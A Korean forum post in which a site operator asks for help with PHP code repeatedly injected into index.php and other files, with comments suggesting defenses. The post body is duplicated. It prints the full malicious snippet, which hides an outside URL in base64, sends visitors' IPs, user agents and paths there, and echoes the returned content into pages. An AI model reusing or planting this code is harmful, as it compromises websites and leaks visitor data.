여러분 웹사이트 문제없나요??? 저만의 문제가 아니네요.
황당 시츄에이션... 자꾸 (!isset($sRetry)) .... 이상한 코드가 index.php 모든파일에...
저만의 문제가 아닙니다...
(!isset($sRetry)) <-- 좌측 검색어로 네이버 다음 구글등에서 검색해 보니 여기저기서 많은 사례가 발생하고 있습니다.
그누보드 G4s 베타버전도 똑같은 증상이네요.
제가 카페호스팅 몇개 운영하고 있는데 대부분 감염이 되고 지우기를 반복하고 있습니다.
증상은 사이트내의 모든 index.php파일의 첫번때 만나는 ?> 뒤로 붙습니다.
심지어는 head.php나 다용도를 사용하는 page.php파일에도 감염이 됩니다.
제가 필리핀에 있어서 해외에서 사용함으로 열어놔서 그러나 생각도 해보고 텔넷을 ON으로 해서 그런가...
여러모로 찾고 있지만 아직 확실한 결론을 못내리고 있습니다.
시원한 답을 주실분.... 소주한잔 살게요
아래에 있는 문제의 코드
<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRFL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?>
저만의 문제가 아닙니다...
(!isset($sRetry)) <-- 좌측 검색어로 네이버 다음 구글등에서 검색해 보니 여기저기서 많은 사례가 발생하고 있습니다.
그누보드 G4s 베타버전도 똑같은 증상이네요.
제가 카페호스팅 몇개 운영하고 있는데 대부분 감염이 되고 지우기를 반복하고 있습니다.
증상은 사이트내의 모든 index.php파일의 첫번때 만나는 ?> 뒤로 붙습니다.
심지어는 head.php나 다용도를 사용하는 page.php파일에도 감염이 됩니다.
제가 필리핀에 있어서 해외에서 사용함으로 열어놔서 그러나 생각도 해보고 텔넷을 ON으로 해서 그런가...
여러모로 찾고 있지만 아직 확실한 결론을 못내리고 있습니다.
시원한 답을 주실분.... 소주한잔 살게요
아래에 있는 문제의 코드
<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRFL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?>
|
댓글 작성
댓글을 작성하시려면 로그인이 필요합니다.
로그인하기
댓글 6개
악성코드임으로 하나라도 남아 있으면 다시 감염됩니다.
카페24호스팅 차원에서의 문제는 아니겠지요?
그리고
common.php 적당한 곳에 $sRetry =1; 이걸 넣어두면 저 코드는 실행되지않겠군요
사실 백업받아서 복구하고 새로운 계정에 올리는게 안전하긴 합니다만....